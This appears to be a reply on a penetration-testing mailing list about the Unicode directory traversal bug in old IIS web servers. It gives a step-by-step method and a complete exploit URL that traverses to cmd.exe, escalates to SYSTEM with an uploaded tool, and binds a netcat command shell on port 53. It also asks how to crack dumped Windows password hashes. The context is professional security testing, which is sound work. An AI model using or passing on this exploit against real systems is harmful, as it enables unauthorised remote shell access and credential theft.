Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?

[Renato Ettisberger <renato.ettisberger () CH PWCGLOBAL COM>]

Hi there,


> > As you know, there is a way to span a shell with admin rights on a IIS
4.0
> > with the Unicode bug.

> What way? Did you use CmdAsp.ASP to do that? Is it possible?

No, I use the tool hk.exe from RAZOR. With this tool, you can launch a
cmd.exe with system
privileges. Upload hk.exe and netcat to the server. The following URL binds
a netcat server
with system privileges on port 53 (this workes fine on our test server
IIS4.0, NT engl. Version)



http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c:

winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe



Form more information about that, see our article at:

http://www.dmzsystems.com/en/articles/windows/iis/IISUnicodeBug.htm


BTW: My question is, how can I crack the password hash, when it comes in
the following form:

F:0x020020000000000000000000....
V:0x00000000a800000......


regards
Renato

P.S: My English is not bad, it's horrible, but I hope you understand what
I'm talking about ;-)














----------------------------------------------------------------
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material.  Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited.   If you received
this in error, please contact the sender and delete the material from any
computer.